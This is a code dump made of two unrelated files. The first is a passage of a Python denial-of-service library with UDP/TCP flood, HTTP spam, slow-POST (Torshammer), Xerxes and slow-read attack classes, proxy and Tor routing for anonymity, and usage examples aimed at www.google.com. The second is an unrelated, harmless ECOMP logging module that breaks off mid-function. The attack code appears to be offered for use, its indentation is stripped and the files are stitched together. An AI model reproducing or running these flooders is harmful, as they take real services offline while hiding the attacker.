if self.stop==True:
break
try:
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
if self.connection==True:
s.connect((self.target,self.port))
s.sendto(self.payload,(self.target,self.port))
self.counter+=1
if((self.logs==True) and (int(time.time()-tm)==1)):
sys.stdout.write("\rPackets: {} ".format(self.counter))
sys.stdout.flush()
tm=time.time()
if self.limiting==True:
time.sleep(self.interval)
except:
pass
try:
time.sleep(self.interval)
except:
pass
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
class tcp_flood:
def __init__(self,u,p=80,threads_daemon=True,min_size=10,max_size=50,threads=256,timeout=5,round_min=50,round_max=150,interval=0.001,duration=60,logs=False,tor=False):
self.logs=logs
self.stop=False
self.counter=0
self.start=time.time()
self.target=u
self.duration=duration
self.port=p
self.timeout=timeout
self.tor=tor
self.min_size=min_size
self.max_size=max_size
self.interval=interval
self.round_min=round_min
self.round_max=round_max
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)#give time for all threads to be created
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor==False:
s.settimeout=(self.timeout)#we can't set timeout with socks module if we are going to use a socks proxy
if self.tor==True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)#let the traffic go through tor
s.connect((self.target,self.port))#connect to target
if (self.port==443) or (self.port==8443):
s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)#use ssl if needed on specific ports
for l in range(random.randint(self.round_min,self.round_max)):#send packets with random number of times for each connection (number between "round_min" and "round_max")
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if stop==True:
break
m=''
for li in range(random.randint(self.min_size,self.max_size)): #each payload' size is chosen randomly between maximum and minimum values
m+=random.choice(lis)
try:
if stop==True:
break
s.send(m.encode('utf-8'))
self.counter+=1
if self.logs==True:
sys.stdout.write("\rPackets: {} | Bytes: {} ".format(self.counter,len(m)))
sys.stdout.flush()
#print("Packets: {} | Bytes: {}".format(tcp_counter,len(m)))
except:
break
time.sleep(self.interval)
s.close()
except:
pass
time.sleep(.1)
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
'''
usage:
>>>bane.tcp_flood('www.google.com')
>>>bane.tcp_flood('www.google.com',p=80, threads=150, timeout=5)
p: (set by default to: 80) targeted port
threads: (set by default to: 256) threads to use
timeout: (set by default to: 5) timeout flag
'''
class http_spam:
def __init__(self,u,p=80,cookie=None,user_agents=None,method=3,threads_daemon=True,paths=["/"],threads=256,post_min=5,post_max=10,post_field_max=100,post_field_min=50,timeout=5,round_min=50,round_max=150,interval=0.001,duration=60,logs=False,tor=False):
self.logs=logs
self.cookie=cookie
self.user_agents=user_agents
if not self.user_agents or len(self.user_agents)==0:
self.user_agents=ua
self.method=method
self.stop=False
self.counter=0
self.start=time.time()
self.target=u
self.duration=duration
self.port=p
self.timeout=timeout
self.tor=tor
self.interval=interval
self.round_min=round_min
self.round_max=round_max
self.paths=paths
self.post_min=post_min
self.post_max=post_max
self.post_field_max=post_field_max
self.post_field_min=post_field_min
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor==False:
s.settimeout=(self.timeout)
if self.tor==True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)
s.connect((self.target,self.port))
if ((self.port==443) or (self.port==8443)):
s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
for l in range(random.randint(self.round_min,self.round_max)):
if self.method==3:
ty=random.randint(1,2)
else:
ty=self.method
if ty==1:
req="GET"
else:
req="POST"
m=setup_http_packet(self.target,ty,self.paths,self.post_field_min,self.post_field_max,self.post_min,self.post_max,self.cookie,self.user_agents)
try:
if self.stop==True:
break
s.send(m.encode('utf-8'))
self.counter+=1
if self.logs==True:
sys.stdout.write("\rRequest: {} | Type: {} | Bytes: {} ".format(self.counter,req,len(m)))
sys.stdout.flush()
#print("Request: {} | Type: {} | Bytes: {}".format(http_counter,req,len(m)))
except:
break
time.sleep(self.interval)
s.close()
except:
pass
time.sleep(.1)
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
class prox_http_spam:
def __init__(self,u,p=80,cookie=None,user_agents=None,method=3,threads_daemon=True,scraping_timeout=15,http_list=None,socks4_list=None,socks5_list=None,paths=["/"],threads=256,post_min=5,post_max=10,post_field_max=100,post_field_min=50,timeout=5,round_min=50,round_max=150,interval=0.001,duration=60,logs=False):
self.logs=logs
self.cookie=cookie
self.user_agents=user_agents
if not self.user_agents or len(self.user_agents)==0:
self.user_agents=ua
self.method=method
self.stop=False
self.counter=0
self.httplist=http_list
if not self.httplist and self.httplist!=[]:
self.httplist=masshttp(timeout=scraping_timeout)
self.socks4list=socks4_list
if not self.socks4list and self.socks4list!=[] :
self.socks4list=massocks4(timeout=scraping_timeout)
self.socks5list=socks5_list
if not self.socks5list and self.socks5list!=[]:
self.socks5list=massocks5(timeout=scraping_timeout)
self.start=time.time()
self.target=u
self.duration=duration
self.port=p
self.timeout=timeout
self.tor=tor
self.interval=interval
self.round_min=round_min
self.round_max=round_max
self.paths=paths
self.post_min=post_min
self.post_max=post_max
self.post_field_max=post_field_max
self.post_field_min=post_field_min
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
bot_type=[]
if len(self.httplist)>0:
bot_type.append("h")
if len(self.socks4list)>0:
bot_type.append("s4")
if len(self.socks5list)>0:
bot_type.append("s5")
z=random.choice(bot_type)
if z=="h":
line=random.choice(self.httplist)
elif z=="s4":
line=random.choice(self.socks4list)
elif z=="s5":
line=random.choice(self.socks5list)
ipp=line.split(":")[0].split("=")[0]
pp=line.split(":")[1].split("=")[0]
s =socks.socksocket()
if z=="h":
s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
elif z=="s4":
s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
elif z=="s5":
s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
if z=="h":
s.settimeout(self.timeout)
s.connect((self.target,self.port))
if ((self.port==443) or (self.port==8443)):
s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
for l in range(random.randint(self.round_min,self.round_max)):
if self.method==3:
ty=random.randint(1,2)
else:
ty=self.method
if ty==1:
req="GET"
else:
req="POST"
m=setup_http_packet(self.target,ty,self.paths,self.post_field_min,self.post_field_max,self.post_min,self.post_max,self.cookie,self.user_agents)
try:
if stop==True:
break
s.send(m.encode('utf-8'))
self.counter+=1
if self.logs==True:
sys.stdout.write("\rBot: {} | Request: {} | Type: {} | Bytes: {} ".format(ipp,self.counter,req,len(m)))
sys.stdout.flush()
#print("Bot: {} | Request: {} | Type: {} | Bytes: {}".format(ipp,lulzer_counter,req,len(m)))
except:
break
time.sleep(self.interval)
s.close()
except:
pass
time.sleep(.1)
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
class torshammer:
def __init__(self,u,p=80,cookie=None,user_agents=None,threads_daemon=True,threads=500,timeout=5,tor=False,duration=60,logs=False,max_content=15000,min_content=10000):
self.counter=0
self.cookie=cookie
self.user_agents=user_agents
if not self.user_agents or len(self.user_agents)==0:
self.user_agents=ua
self.max_content=max_content
self.min_content=min_content
self.stop=False
self.start=time.time()
self.target=u
self.duration=duration
self.port=p
self.timeout=timeout
self.tor=tor
self.logs=logs
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor==False:
s.settimeout(self.timeout)
if self.tor==True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)
s.connect((self.target,self.port))
if ((self.port==443) or (self.port==8443)):
s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
self.counter+=1
if self.logs==True:
sys.stdout.write("\rConnected to {}:{}...".format(self.target,self.port))
sys.stdout.flush()
#print("Connected to {}:{}...".format(self.target,self.port))
q=random.randint(self.min_content,self.max_content)
ck=""
if self.cookie:
ck="Cookie: "+self.cookie+"\r\n"
s.send(reorder_headers_randomly("POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(random.choice(paths),ck,random.choice(self.user_agents),random.randint(300,1000),q,(random.choice(referers)+random.choice(lis)+str(random.randint(0,100000000))+random.choice(lis)),self.target)).encode('utf-8'))
for i in range(q):
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
h=random.choice(lis)
try:
s.send(h.encode('utf-8'))
if self.logs==True:
sys.stdout.write("\rPosted: {}".format(h))
sys.stdout.flush()
#print("Posted: {}".format(h))
time.sleep(random.uniform(.1,3))
except:
break
s.close()
except:
pass
self.counter-=1
time.sleep(.1)
if self.stop==True:
break
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
class prox_hammer:
def __init__(self,u,p=80,cookie=None,user_agents=None,threads_daemon=True,scraping_timeout=15,max_content=15000,min_content=10000,threads=700,timeout=5,http_list=None,socks4_list=None,socks5_list=None,duration=60,logs=True):
self.cookie=cookie
self.user_agents=user_agents
if not self.user_agents or len(self.user_agents)==0:
self.user_agents=ua
self.httplist=http_list
if not self.httplist and self.httplist!=[]:
self.httplist=masshttp(timeout=scraping_timeout)
self.socks4list=socks4_list
if not self.socks4list and self.socks4list!=[] :
self.socks4list=massocks4(timeout=scraping_timeout)
self.socks5list=socks5_list
if not self.socks5list and self.socks5list!=[]:
self.socks5list=massocks5(timeout=scraping_timeout)
self.stop=False
self.start=time.time()
self.target=u
self.duration=duration
self.port=p
self.timeout=timeout
self.max_content=max_content
self.min_content=min_content
self.logs=logs
self.counter=0
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
bot_type=[]
if len(self.httplist)>0:
bot_type.append("h")
if len(self.socks4list)>0:
bot_type.append("s4")
if len(self.socks5list)>0:
bot_type.append("s5")
z=random.choice(bot_type)
if z=="h":
line=random.choice(self.httplist)
elif z=="s4":
line=random.choice(self.socks4list)
elif z=="s5":
line=random.choice(self.socks5list)
ipp=line.split(":")[0].split("=")[0]
pp=line.split(":")[1].split("=")[0]
s =socks.socksocket()
if z=="h":
s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
elif z=="s4":
s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
elif z=="s5":
s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
if z=="h":
s.settimeout(self.timeout)
s.connect((self.target,self.port))
self.counter+=1
if ((self.port==443)or(self.port==8443)):
s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
q=random.randint(self.min_content,self.max_content)
ck=""
if self.cookie:
ck="Cookie: "+cookie+"\r\n"
s.send(reorder_headers_randomly("POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(random.choice(paths),ck,random.choice(self.user_agents),random.randint(300,1000),q,(random.choice(referers)+random.choice(lis)+str(random.randint(0,100000000))+random.choice(lis)),self.target)).encode('utf-8'))
for i in range(q):
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
h=random.choice(lis)
try:
s.send(h.encode('utf-8'))
if self.logs==True:
sys.stdout.write("\rPosted: {} --> {}".format(h,ipp))
sys.stdout.flush()
#print("Posted: {} --> {}".format(h,ipp))
time.sleep(random.uniform(.1,3))
except:
break
s.close()
except:
pass
self.counter-=1
time.sleep(.1)
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
class xerxes:
def __init__(self,u,p=80,threads_daemon=True,threads=500,timeout=5,duration=60,logs=False,tor=False):
self.counter=0
self.target=u
self.port=p
self.stop=False
self.duration=duration
self.timeout=timeout
self.tor=tor
self.start=time.time()
self.logs=logs
self.id_key=0
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
self.id_key+=1
def attack(self):
try:
x=self.id_key
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor==False:
s.settimeout(self.timeout)
if self.tor==True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)
s.connect((self.target,self.port))
self.counter+=1
"""if self.logs==True:
#print("[Connected to {}:{}]".format(self.target,self.port))
sys.stdout.write("\r[Connected to {}:{}]".format(self.target,self.port))
sys.stdout.flush()"""
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s.send("\x00".encode('utf-8'))#send NULL character
if self.logs==True:
sys.stdout.write("\r[{}: Voly sent] ".format(x))
sys.stdout.flush()
except:
break
time.sleep(.2)
except:
pass
self.counter-=1
time.sleep(.3)
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
class prox_xerxes:
def __init__(self,u,scraping_timeout=15,p=80,threads_daemon=True,threads=700,timeout=5,http_list=None,socks4_list=None,socks5_list=None,duration=60,logs=False):
self.httplist=http_list
if not self.httplist and self.httplist!=[]:
self.httplist=masshttp(timeout=scraping_timeout)
self.socks4list=socks4_list
if not self.socks4list and self.socks4list!=[] :
self.socks4list=massocks4(timeout=scraping_timeout)
self.socks5list=socks5_list
if not self.socks5list and self.socks5list!=[]:
self.socks5list=massocks5(timeout=scraping_timeout)
self.stop=False
self.counter=0
self.start=time.time()
self.target=u
self.duration=duration
self.port=p
self.timeout=timeout
self.logs=logs
self.id_key=0
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
self.id_key+=1
def attack(self):
try:
x=self.id_key
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
bot_type=[]
if len(self.httplist)>0:
bot_type.append("h")
if len(self.socks4list)>0:
bot_type.append("s4")
if len(self.socks5list)>0:
bot_type.append("s5")
z=random.choice(bot_type)
if z=="h":
line=random.choice(self.httplist)
elif z=="s4":
line=random.choice(self.socks4list)
elif z=="s5":
line=random.choice(self.socks5list)
ipp=line.split(":")[0].split("=")[0]
pp=line.split(":")[1].split("=")[0]
s =socks.socksocket()
if z=="h":
s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
elif z=="s4":
s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
elif z=="s5":
s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
if z=="h":
s.settimeout(self.timeout)
s.connect((self.target,self.port))
self.counter+=1
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s.send("\x00".encode('utf-8'))#send NULL character
if self.logs==True:
sys.stdout.write("\r[{}: Voly sent-->{}] ".format(x,ipp))
sys.stdout.flush()
except:
break
time.sleep(.2)
except:
pass
self.counter-=1
time.sleep(.3)
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
'''
this tool is to perform slow reading attack. i read about this type of attacks on: https://blog.qualys.com/tag/slow-http-attack and tried to do the same thing in python (but in a better way though :p ). on this attack, the attacker is sending a full legitimate HTTP request but reading it slowly to keep the connection open as long as possible. here im doing it a bit different of the original attack with slowhttptest, im sending a normal HTTP request on each thread then read a small part of it (between 1 to 3 bytes randomly sized) then it sleeps for few seconds (3 to 5 seconds randomly sized too), then it sends another request and keep doing the same and keeping the connection open forever.
it takes the following parameters:
u: target ip or domain
p: (set by default to: 80)
threads: (set by default to: 500) number of connections
timeout: (set by default to: 5) connection timeout flag
example:
>>>import bane
>>>bane.slow_read_attack('www.google.com',p=443,threads=300,timeout=7)
'''
class slow_read:
def __init__(self,u,p=80,cookie=None,user_agents=None,paths=["/"],threads_daemon=True,threads=500,timeout=5,min_speed=3,max_speed=5,max_read=3,min_read=1,logs=False,tor=False,duration=60):
self.counter=0
self.cookie=cookie
self.user_agents=user_agents
if not self.user_agents or len(self.user_agents)==0:
self.user_agents=ua
self.stop=False
self.target=u
self.port=p
self.paths=paths
self.timeout=timeout
self.tor=tor
self.read_max=max_read
self.read_min=min_read
self.min_speed=min_speed
self.max_speed=max_speed
self.logs=logs
self.duration=duration
self.start=time.time()
for x in range(threads):
t=threading.Thread(target=self.attack)
t.daemon=threads_daemon
t.start()
def attack(self):
try:
time.sleep(1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor==False:
s.settimeout(self.timeout)
if self.tor==True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True)
s.connect((self.target,self.port))
if ((self.port==443)or(self.port==8443)):
s=ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
while True:
if (int(time.time()-self.start)>=self.duration):#this is a safety mechanism so the attack won't run forever
break
if self.stop==True:
break
try:
s.send(setup_http_packet(self.target,3,self.paths,2,8,10,50,self.cookie,self.user_agents).encode('utf-8'))
self.counter+=1
while True:
d=s.recv(random.randint(self.read_min,self.read_max))
if self.logs==True:
sys.stdout.write("\rReceived: {} ".format(str(d.decode('utf-8').strip())))
sys.stdout.flush()
#print("Received: {}".format(str(d.decode('utf-8'))))
time.sleep(random.randint(self.min_speed,self.max_speed))
except:
break
s.close()
except:
pass
self.kill()
except:
pass
def done(self):
if 'stop' in dir(self):
return False
return True
def reset(self):
l=[]
for x in self.__dict__:
self.__dict__[x]=None
l.append(x)
for x in l:
delattr(self,x)
def kill(self):
if 'stop' in dir(self):
self.stop=True
a=self.__dict__["counter"]
self.reset()
return a
"""
The rest of the DDoS tools have been removed and will be added slowly in the coming versions :) Be patient !!
"""
|
CommonLogger.py
|
#!/usr/bin/python
# -*- indent-tabs-mode: nil -*- vi: set expandtab:
"""ECOMP Common Logging library in Python.
CommonLogger.py
# Copyright (C) 2017 AT&T Intellectual Property. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this code except in compliance
# with the License. You may obtain a copy of the License
# at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
Originally written by: Terry Schmalzried
Date written: October 1, 2015
Last updated: December 1, 2016
version 0.8
"""
from __future__ import print_function
import os, sys, getopt, logging, logging.handlers, time, re, uuid, socket, threading
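# Minimal usage sketch (comments only; the file names and field values are illustrative
# assumptions, not part of this module). A config file such as 'component.properties'
# maps the log key to a file and options, e.g.:
#     error         = /var/log/component/error.log
#     errorLogLevel = WARN
#     errorStyle    = error
#
#   >>> errorLog = CommonLogger('component.properties', 'error',
#   ...                         serviceName='component', threadID='main')
#   >>> errorLog.error('something went wrong', errorCode='500', errorDescription='timeout')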
class CommonLogger:
"""ECOMP Common Logging object.
Public methods:
__init__
setFields
debug
info
warn
error
fatal
"""
UnknownFile = -1
ErrorFile = 0
DebugFile = 1
AuditFile = 2
MetricsFile = 3
DateFmt = '%Y-%m-%dT%H:%M:%S'
def __init__(self, configFile, logKey, **kwargs):
"""Construct a Common Logger for one Log File.
Arguments:
configFile -- configuration filename.
logKey -- the keyword in configFile that identifies the log filename.
        Keyword arguments: Annotations are d=debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages,
one of CommonLogger.ErrorFile, CommonLogger.DebugFile,
CommonLogger.AuditFile and CommonLogger.MetricsFile, or
one of the strings "error", "debug", "audit" or "metrics".
May also be set in the config file using a field named
<logKey>Style (where <logKey> is the value of the logKey
parameter). The keyword value overrides the value in the
config file.
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
self._monitorFlag = False
# Get configuration parameters
self._logKey = str(logKey)
self._configFile = str(configFile)
self._rotateMethod = 'time'
self._timeRotateIntervalType = 'midnight'
self._timeRotateInterval = 1
self._sizeMaxBytes = 0
self._sizeRotateMode = 'a'
self._socketHost = None
self._socketPort = 0
self._typeLogger = 'filelogger'
self._backupCount = 6
self._logLevelThreshold = self._intLogLevel('')
self._logFile = None
self._begTime = None
self._begMsec = 0
self._fields = {}
self._fields["style"] = CommonLogger.UnknownFile
try:
self._configFileModified = os.path.getmtime(self._configFile)
for line in open(self._configFile):
line = line.split('#',1)[0] # remove comments
if '=' in line:
key, value = [x.strip() for x in line.split('=',1)]
if key == 'rotateMethod' and value.lower() in ['time', 'size', 'none']:
self._rotateMethod = value.lower()
elif key == 'timeRotateIntervalType' and value in ['S', 'M', 'H', 'D', 'W0', 'W1', 'W2', 'W3', 'W4', 'W5', 'W6', 'midnight']:
self._timeRotateIntervalType = value
elif key == 'timeRotateInterval' and int( value ) > 0:
self._timeRotateInterval = int( value )
elif key == 'sizeMaxBytes' and int( value ) >= 0:
self._sizeMaxBytes = int( value )
elif key == 'sizeRotateMode' and value in ['a']:
self._sizeRotateMode = value
elif key == 'backupCount' and int( value ) >= 0:
self._backupCount = int( value )
elif key == self._logKey + 'SocketHost':
self._socketHost = value
                    elif key == self._logKey + 'SocketPort' and int( value ) > 0:
self._socketPort = int( value )
elif key == self._logKey + 'LogType' and value.lower() in ['filelogger', 'stdoutlogger', 'stderrlogger', 'socketlogger', 'nulllogger']:
self._typeLogger = value.lower()
elif key == self._logKey + 'LogLevel':
self._logLevelThreshold = self._intLogLevel(value.upper())
elif key == self._logKey + 'Style':
self._fields["style"] = value
elif key == self._logKey:
self._logFile = value
except Exception as x:
print("exception reading '%s' configuration file: %s" %(self._configFile, str(x)), file=sys.stderr)
sys.exit(2)
except:
print("exception reading '%s' configuration file" %(self._configFile), file=sys.stderr)
sys.exit(2)
if self._logFile is None:
print('configuration file %s is missing definition %s for log file' %(self._configFile, self._logKey), file=sys.stderr)
sys.exit(2)
# initialize default log fields
# timestamp will automatically be generated
for key in ['style', 'requestID', 'serviceInstanceID', 'threadID', 'serverName', 'serviceName', 'instanceUUID', \
'severity', 'serverIPAddress', 'server', 'IPAddress', 'className', 'timer', \
'partnerName', 'targetEntity', 'targetServiceName', 'statusCode', 'responseCode', \
'responseDescription', 'processKey', 'targetVirtualEntity', 'customField1', \
'customField2', 'customField3', 'customField4', 'errorCategory', 'errorCode', \
'errorDescription' ]:
if key in kwargs and kwargs[key] != None:
self._fields[key] = kwargs[key]
self._resetStyleField()
# Set up logger
self._logLock = threading.Lock()
with self._logLock:
self._logger = logging.getLogger(self._logKey)
self._logger.propagate = False
self._createLogger()
self._defaultServerInfo()
# spawn a thread to monitor configFile for logLevel and logFile changes
self._monitorFlag = True
self._monitorThread = threading.Thread(target=self._monitorConfigFile, args=())
self._monitorThread.daemon = True
self._monitorThread.start()
def _createLogger(self):
if self._typeLogger == 'filelogger':
self._mkdir_p(self._logFile)
if self._rotateMethod == 'time':
self._logHandler = logging.handlers.TimedRotatingFileHandler(self._logFile, \
when=self._timeRotateIntervalType, interval=self._timeRotateInterval, \
backupCount=self._backupCount, encoding=None, delay=False, utc=True)
elif self._rotateMethod == 'size':
self._logHandler = logging.handlers.RotatingFileHandler(self._logFile, \
mode=self._sizeRotateMode, maxBytes=self._sizeMaxBytes, \
backupCount=self._backupCount, encoding=None, delay=False)
else:
self._logHandler = logging.handlers.WatchedFileHandler(self._logFile, \
mode=self._sizeRotateMode, \
encoding=None, delay=False)
        elif self._typeLogger == 'stderrlogger':
            self._logHandler = logging.StreamHandler(sys.stderr)
        elif self._typeLogger == 'stdoutlogger':
            self._logHandler = logging.StreamHandler(sys.stdout)
        elif self._typeLogger == 'socketlogger':
            self._logHandler = logging.handlers.SocketHandler(self._socketHost, self._socketPort)
        elif self._typeLogger == 'nulllogger':
            self._logHandler = logging.NullHandler()
if self._fields["style"] == CommonLogger.AuditFile or self._fields["style"] == CommonLogger.MetricsFile:
self._logFormatter = logging.Formatter(fmt='%(begtime)s,%(begmsecs)03d+00:00|%(endtime)s,%(endmsecs)03d+00:00|%(message)s', datefmt=CommonLogger.DateFmt)
else:
self._logFormatter = logging.Formatter(fmt='%(asctime)s,%(msecs)03d+00:00|%(message)s', datefmt='%Y-%m-%dT%H:%M:%S')
self._logFormatter.converter = time.gmtime
self._logHandler.setFormatter(self._logFormatter)
self._logger.addHandler(self._logHandler)
def _resetStyleField(self):
styleFields = ["error", "debug", "audit", "metrics"]
if self._fields['style'] in styleFields:
self._fields['style'] = styleFields.index(self._fields['style'])
def __del__(self):
if self._monitorFlag == False:
return
self._monitorFlag = False
if self._monitorThread is not None and self._monitorThread.is_alive():
self._monitorThread.join()
self._monitorThread = None
def _defaultServerInfo(self):
# If not set or purposely set = None, then set default
if self._fields.get('server') is None:
try:
self._fields['server'] = socket.getfqdn()
except Exception as err:
try:
self._fields['server'] = socket.gethostname()
except Exception as err:
self._fields['server'] = ""
# If not set or purposely set = None, then set default
if self._fields.get('serverIPAddress') is None:
try:
self._fields['serverIPAddress'] = socket.gethostbyname(self._fields['server'])
except Exception as err:
self._fields['serverIPAddress'] = ""
def _monitorConfigFile(self):
while self._monitorFlag:
try:
fileTime = os.path.getmtime(self._configFile)
if fileTime > self._configFileModified:
self._configFileModified = fileTime
ReopenLogFile = False
logFile = self._logFile
with open(self._configFile) as fp:
for line in fp:
line = line.split('#',1)[0] # remove comments
if '=' in line:
key, value = [x.strip() for x in line.split('=',1)]
